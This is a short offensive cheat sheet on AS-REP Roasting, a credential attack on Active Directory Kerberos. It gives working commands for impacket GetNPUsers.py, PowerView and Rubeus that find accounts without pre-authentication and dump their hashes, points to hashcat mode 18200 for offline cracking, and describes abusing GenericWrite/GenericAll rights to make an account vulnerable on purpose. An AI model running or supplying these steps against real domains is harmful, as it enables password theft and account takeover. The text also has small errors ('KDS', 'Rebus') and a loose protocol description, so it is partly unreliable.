AS-REP Roasting

The first phase of Kerberos where the client sends the encrypted timestamp with the password hash and the KDC returns the TGT only if it is valid, is called pre-authentication. If it is not present or is disabled, the client sends a TGT request specifying the username and the KDS returns the encrypted TGT with the hash of the user's password. However, this allows an attacker to make a false request for a certain user, obtain the encrypted TGT with the hash of that user's password and then perform offline cracking. By default, not requiring pre-authentication is disabled, but it is possible to enable it and you can often find configurations where it is enabled.

Attack

Remotely

Linux

impacket-GetNPUsers will attempt to list and get TGTs for those users who have the property "Do not require Kerberos pre-authentication". You must have the credentials of a domain user to perform the extraction.

GetNPUsers.py -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]>

GetNPUsers.py -dc-ip <IP_DC> -request -outputfile <OutputFile> <DOMAIN>/<USER[:PASSWORD]>

GetNPUsers.py -dc-ip <IP_DC> -no-pass -usersfile valid_ad_users.txt

Offline cracking of file <OutputFile> with hashcat (-m 18200)

Locally

Windows

Since we are already in a windows system belonging to the domain, we do not need to specify username and password.

With PowerView you can see accounts with no pre-authentication required.

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

We can use Rebus to perform the AS-REP Roasting attack.

.\Rubeus.exe asreproast /nowrap 

.\Rubeus.exe asreproast /format:hashcat /outfile:<OutputFile>

Offline cracking of file <OutputFile> with hashcat (-m 18200)

If an attacker has GenericWrite or GenericAll permissions over an account, they can enable "not requiring pre-authentication" and obtain the AS-REP ticket for offline cracking to recover the account's password before disabling the attribute again.